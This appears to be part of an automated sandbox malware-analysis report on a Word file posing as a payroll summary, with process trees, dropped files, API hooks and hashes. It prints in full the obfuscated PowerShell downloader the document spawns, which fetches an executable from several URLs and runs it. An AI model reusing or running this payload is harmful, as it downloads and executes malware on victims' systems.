9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))"), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "57463.exe" (Show Process), Spawned process "cmnmspthrd.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"57463.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~$172 Payroll Summary.doc" has type "data"
"09172 Payroll Summary.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu May 17 20:52:27 2018 mtime=Thu May 17 20:52:27 2018 atime=Thu May 17 20:52:42 2018 length=167424 window=hide"
"09172%20Payroll%20Summary.doc.lnk" has type "MS Windows shortcut Item id list present Points to a file or directory Has Description string Has Relative path Has command line arguments Archive ctime=Thu May 17 20:52:27 2018 mtime=Thu May 17 20:52:27 2018 atime=Thu May 17 20:52:42 2018 length=167424 window=hide"
"index.dat" has type "data"
"~WRD0000.tmp" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Title: Ryfewujashowavae46504 Subject: Ryfewujasho58022 Author: Ryfewuja84323 Template: Normal Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Thu May 17 19:45:00 2018 Last Saved Time/Date: Thu May 17 19:45:00 2018 Number of Pages: 1 Number of Words: 0 Number of Characters: 5 Security: 0"
"~WRD0002.tmp" has type "Composite Document File V2 Document Cannot read section info"
"QR3RTP9CEYNQI3ODIF1G.temp" has type "data"
"~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp" has type "data"
"~WRD0003.tmp" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Title: Ryfewujashowavae46504 Subject: Ryfewujasho58022 Template: Normal Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Thu May 17 19:45:00 2018 Last Saved Time/Date: Thu May 17 23:07:00 2018 Number of Pages: 1 Number of Words: 1 Number of Characters: 7 Security: 0"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\w32x86\3\sendtoonenote.BUD"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\w32x86\3\sendtoonenote.gpd" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9U"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Heuristic match: "ifcingenieria.cl" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "cd596467" to virtual address "0x6ADECA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "3d086b67" to virtual address "0x68AB0BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "028b6367" to virtual address "0x6B16F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "6e317d67" to virtual address "0x63B110AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e936551af1" to virtual address "0x776F3EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "59436467" to virtual address "0x69AB78E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "c4ca937780bb9377aa6e94779fbb937708bb937746ce937761389477de2f9477d0d9937700000000177958764f9158767f6f5876f4f7587611f75876f2835876857e587600000000" to virtual address "0x70691000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e99e48f1f0" to virtual address "0x77943D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "816d7f67" to virtual address "0x63A09904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baac461f0068dcf5de62c3" to virtual address "0x0020F05C"
"WINWORD.EXE" wrote bytes "ba80502700b98b7bde62ffe1" to virtual address "0x0021173A"
"WINWORD.EXE" wrote bytes "2ef1aa67" to virtual address "0x2FE21B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baec461f0068dcf5de62c3" to virtual address "0x0020F07C"
"WINWORD.EXE" wrote bytes "e923991cf1" to virtual address "0x776F5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e960331af1" to virtual address "0x776F4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "bad02e6805b98b7bde62ffe1" to virtual address "0x002105BE"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baac471f0068dcf5de62c3" to virtual address "0x0020F0DC"
"WINWORD.EXE" wrote bytes "babcb67005b98b7bde62ffe1" to virtual address "0x00210C36"
"WINWORD.EXE" wrote bytes "ba04ac6905b98b7bde62ffe1" to virtual address "0x00211712"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baec471f0068dcf5de62c3" to virtual address "0x0020F0FC" - source
- Hook Detection
- relevance
- 10/10
-
Installs hooks/patches the running process
File Details
All Details:
09172 Payroll Summary.doc
- Filename
- 09172 Payroll Summary.doc
- Size
- 164KiB (167424 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Author: Ryfewuja84323, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 08:45:00 2018, Last Saved Time/Date: Thu May 17 08:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 1533b6f547784d1f220e52dc4509ea45e55ccf3de5a1ea1849ebad89de1c5495
- MD5
- 2a1e6f619f0c407cb8b15b67f869df26
- SHA1
- 51fa8d9e54104ae33fda32aabe2cead6c36f9587
Resources
- Icon
-
Visualization
- Input File (PortEx)
-
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\09172 Payroll Summary.doc"
(PID: 2508)
-
cmd.exe
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 4016, Additional Context: Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124)))
-
powershell.exe
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 